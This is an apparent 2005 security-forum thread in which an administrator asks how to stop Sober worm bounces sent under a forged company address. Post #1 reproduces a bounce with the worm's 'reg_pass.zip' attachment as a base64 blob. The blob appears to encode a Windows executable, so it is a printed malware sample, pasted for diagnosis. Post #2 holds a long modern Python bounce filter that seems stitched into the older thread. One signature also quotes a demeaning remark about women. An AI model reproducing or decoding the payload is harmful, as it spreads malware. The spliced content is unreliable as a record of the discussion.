Sober Issue

  1. #1
    Junior Member
    Join Date
    Dec 2005
    Posts
    10

    Sober Issue

    Hi there!
    Well, I thought for my first post I would ask some of you more knowledgeable folk for some assistance.

    Anyway, the Sober worm is pounding our mail servers insanely. Luckily 99.9% of the mail is being stopped, which is awesome! The issue resides with that last 0.1%.

    One of our users has info@ourdomain.com as an alias, for various reasons. For some reason, he continually gets rejected and bounced emails, all relating to the Sober.X worm. Observe:

    Code:
    -----Original Message-----
    From: Mail Error Handler [mailto:MAILER-DAEMON@ibuyhouses.com]
    Sent: Saturday, December 17, 2005 3:13 AM
    To: info
    Subject: Undeliverable Mail Returned to Sender
    
    *** This message was automatically generated by the MailMax Error Responder ***
    
    Sorry, your message from <info@ourdomain.com> to <mike.ochsner@gmail.com> could not be delivered. The specific error is:
    
      552 5.7.0 Illegal Attachment i38si6000307wxd
    
    
    This is permanent error, and the message will not be retried any further.
    
    === The Original Message Follows ===
    
    Received: from [151.199.126.160] by ibuyhouses.com [192.168.1.100] with SmartMax MailMax for lexi-outbound@ibuyhouses.com; Sat, 17 Dec 2005 04:12:19 -0500
    Return-Path: <info@ourdomain.com>
    X-SmartMax-AuthUser: 
    From: info@ourdomain.com
    To: usbmis_news@ibuyhouses.com
    Date: Sat, 17 Dec 2005 08:53:18 GMT
    Subject: Registration Confirmation
    Importance: Normal
    X-Priority: 3 (Normal)
    Message-ID: <684b28de1669c6bbe@ourdomain.com>
    MIME-Version: 1.0
    Content-Type: multipart/mixed; boundary="=b80bafc1c.3a3348f3b"
    Content-Transfer-Encoding: 7bit
    
    
    
    --=b80bafc1c.3a3348f3b
    
    Account and Password Information are attached!
    --=b80bafc1c.3a3348f3b
    Content-Type: application/octet-stream; name=reg_pass.zip
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename="reg_pass.zip"
    
    UEsDBAoAAAAAAACQdjPMyus3XtgAAF7YAAAYAAAARmlsZS1wYWNrZWRfZGF0YUluZm8uZXhlTVqQ
    AAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    yAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
    DQ0KJAAAAAAAAABd+8faGZqpiRmaqYkZmqmJmoaniRiaqYlwhaCJHJqpiQmFpIkYmqmJUmljaBma
    qYkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDAOVIXUMAAAAAAAAAAOAADwELAQYAANAA
    AAAQAAAAQAIA0BkDAABQAgAAIAMAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAAAwAwAAEAAA
    AAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAEAiAwCcAAAAACADAEACAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAC
    AAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOAAAAAAAAAAAADQAAAAUAIAAMwAAAAEAAAAAAAA
    AAAAAAAAAABAAADgLnJzcmMAAAAAEAAAACADAAAEAAAA0AAAAAAAAAAAAAAAAAAAQAAAwAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    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
    
    
    === End Original Message ===
    
    *** This message was automatically generated by the MailMax Error Responder ***

    Now, "reg_pass.zip" is a Sober payload, that much I know. But from what I have read about Sober, it will forge the sender's address. This is all well and good, but the forged address (if I am reading this correctly) is one of our legitimate addresses! I had set up some rules on the user's email client to automatically trash these messages, but it appears some are continually getting through. Apparently he got 30 of these just this morning. Anyway, I've done a full scan of every box on our network, and none of them are infected. I probably didn't need to do this, because if someone was infected, we'd be seeing tons of these messages on everyone's computer.

    So I guess my question is, what can I do to stop this? I have no idea how this worm somewhere got one of our legitimate email addresses; it seems to me that the ibuyhouses.com guy has the info@ourdomain.com address stored in their client, and that he is infected? Am I right in assuming this? What the heck can I do?

  2. #2
    AO Senior Cow-beller
    Moderator
    zencoder's Avatar
    Join Date
    Dec 2004
    Location
    Mountain standard tribe.
    Posts
    1,177
    There is not one whit of anything you can do about your legitimate address being forged in messages sent from infected machines. The problem is akin to a person in Malaysia telling people he knows you personally and that you vouch for his product...assuming you DO live in the USA as your profile suggests, and you've never been to Malaysia, met this person, or had any interaction with him.

    You simply have no influence or control over that part of this problem.

    As for the incoming bounce replies...do you have a bridgehead type server, scanning all incoming messages? Are they getting by that server? If so, you need to look at the configuration and block/drop rules on that server. If not...well, all I can suggest is you look into one.

    Or you could look into a service provider to do it for you. Postino is a big player in this field. So is VeriSign. I'm sure there are many companies that would be happy to receive your email, and filter it before it hits your network...for a fee.
    "Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
    Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
    "...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore
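    The block/drop rule suggested above can be made concrete for the kind of bounce shown in post #1. The following is an added example, not code from the thread or from any product named in it: it pulls the inlined original out of a MailMax-style bounce, checks whether the original claims a sender at our domain without ever passing through our own mail hosts, and looks inside a zip attachment for executable member names. OUR_DOMAIN, OUR_MAIL_HOSTS, the hostnames and IP addresses, and the zip attachment are all placeholders constructed here, not values from the thread.

```python
import base64
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from typing import Optional

# Assumed for this example: our domain and the hostnames that appear in the
# Received: chain of mail we genuinely send. Both are placeholders.
OUR_DOMAIN = "ourdomain.com"
OUR_MAIL_HOSTS = ("mail.ourdomain.com",)
RISKY_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")

# Markers the MailMax responder in the thread wraps the original message in.
BEGIN_MARKER = "=== The Original Message Follows ==="
END_MARKER = "=== End Original Message ==="


def build_sample_bounce(via_us: bool = False, attach_zip: bool = True) -> str:
    """Construct a bounce shaped like the one in the thread (constructed sample).

    The zip is built here from placeholder bytes; it is not the worm sample.
    via_us=True adds a Received: hop through our own mail host, i.e. a bounce
    of mail we really sent.
    """
    boundary = "=b80bafc1c.3a3348f3b"
    received = ""
    if via_us:
        received += ("Received: from mail.ourdomain.com [203.0.113.7] by "
                     "bouncing-host.example [198.51.100.5]; Sat, 17 Dec 2005 04:12:18 -0500\n")
    received += ("Received: from [192.0.2.10] by bouncing-host.example [198.51.100.5] "
                 "with SmartMax MailMax; Sat, 17 Dec 2005 04:12:19 -0500\n")
    attachment = ""
    if attach_zip:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("File-packed_dataInfo.exe", b"placeholder bytes, not an executable")
        attachment = (
            f"--{boundary}\n"
            "Content-Type: application/octet-stream; name=reg_pass.zip\n"
            "Content-Transfer-Encoding: base64\n"
            'Content-Disposition: attachment; filename="reg_pass.zip"\n'
            "\n" + base64.encodebytes(buf.getvalue()).decode("ascii")
        )
    original = (
        f"{received}"
        f"Return-Path: <info@{OUR_DOMAIN}>\n"
        f"From: info@{OUR_DOMAIN}\n"
        "To: someone@bouncing-host.example\n"
        "Subject: Registration Confirmation\n"
        "MIME-Version: 1.0\n"
        f'Content-Type: multipart/mixed; boundary="{boundary}"\n'
        "\n"
        f"--{boundary}\n"
        "\n"
        "Account and Password Information are attached!\n"
        f"{attachment}"
        f"--{boundary}--\n"
    )
    return ("*** This message was automatically generated by the MailMax Error Responder ***\n\n"
            "Sorry, your message could not be delivered. The specific error is:\n\n"
            "  552 5.7.0 Illegal Attachment\n\n"
            f"{BEGIN_MARKER}\n\n{original}\n{END_MARKER}\n")


def extract_original(bounce_text: str) -> Optional[EmailMessage]:
    """Return the quoted original message, or None if the markers are absent."""
    start = bounce_text.find(BEGIN_MARKER)
    if start == -1:
        return None
    end = bounce_text.find(END_MARKER, start)
    body = bounce_text[start + len(BEGIN_MARKER):end if end != -1 else None]
    return email.message_from_string(body.strip("\n") + "\n", policy=policy.default)


def zip_member_names(part: EmailMessage) -> list:
    """List the file names inside a zip attachment without extracting anything."""
    try:
        with zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True))) as zf:
            return zf.namelist()
    except zipfile.BadZipFile:
        return []


def classify_bounce(bounce_text: str) -> dict:
    """Decide whether a bounce is backscatter from a forged sender and say why."""
    original = extract_original(bounce_text)
    if original is None:
        return {"verdict": "not-a-recognised-bounce", "reasons": []}
    reasons = []
    sender = parseaddr(str(original.get("Return-Path") or original.get("From") or ""))[1].lower()
    claims_us = sender.endswith("@" + OUR_DOMAIN)
    hops = [str(h).lower() for h in original.get_all("Received", [])]
    via_us = any(host in hop for hop in hops for host in OUR_MAIL_HOSTS)
    forged = claims_us and not via_us
    if forged:
        reasons.append("original claims a sender at our domain but never passed through our mail hosts")
    has_exe = False
    for part in original.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(".zip"):
            risky = [n for n in zip_member_names(part) if n.lower().endswith(RISKY_EXTENSIONS)]
            if risky:
                has_exe = True
                reasons.append(f"{name} contains executable content: {', '.join(risky)}")
    return {"verdict": "drop" if (forged or has_exe) else "deliver", "reasons": reasons}


if __name__ == "__main__":
    print(classify_bounce(build_sample_bounce()))
    print(classify_bounce(build_sample_bounce(via_us=True, attach_zip=False)))
```

    The Received: check is the one that matters for the thread's situation: a bounce whose original never touched our own servers is backscatter no matter what it claims in From, and can be dropped at the gateway before it reaches the user's client. The zip inspection only needs member names, so nothing is extracted or executed.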

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    I have no idea how this worm somewhere got one of our legitimate email addresses; it seems to me that the ibuyhouses.com guy has the info@ourdomain.com address stored in their client, and that he is infected? Am I right in assuming this?
    Actually it's more likely that both addresses were stored on a computer that became infected. Viruses tend not to use the addresses of computers they infect in order to keep them infected. They take stored email addys and use one in the sender field and send to the rest.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  4. #4
    Junior Member
    Join Date
    Dec 2005
    Posts
    10
    See, I wouldn't think so. The headers look like someone that uses the ibuyhouses.com mail server attempted to send an email to that gmail account. Which to me says that both my user's address and the gmail address are stored on the aforementioned computer.

  5. #5
    Blast From the Past
    Join Date
    Jan 2003
    Posts
    729
    God, what I would give to be sober... read my mood.
    work it harder, make it better, do it faster, makes us stronger

  6. #6
    BIOS Bomber
    Join Date
    Jul 2003
    Location
    Michigan
    Posts
    357
    Sorry to say, but something like this won't do it, heh. Find something stronger.
    "When in doubt, use Brute Force."

    Never argue with an idiot. They'll drag you down to their level, then beat you with experience.

  7. #7
    Junior Member
    Join Date
    Dec 2005
    Posts
    10
    Sorry to say, but something like this won't do it, heh. Find something stronger.
    I have no idea what you are talking about.

  8. #8
    BIOS Bomber
    Join Date
    Jul 2003
    Location
    Michigan
    Posts
    357
    Originally posted here by hexadecimal
    God, what I would give to be sober... read my mood.
    That's what I was talking about... it was a joke, calm down son.
    "When in doubt, use Brute Force."

    Never argue with an idiot. They'll drag you down to their level, then beat you with experience.
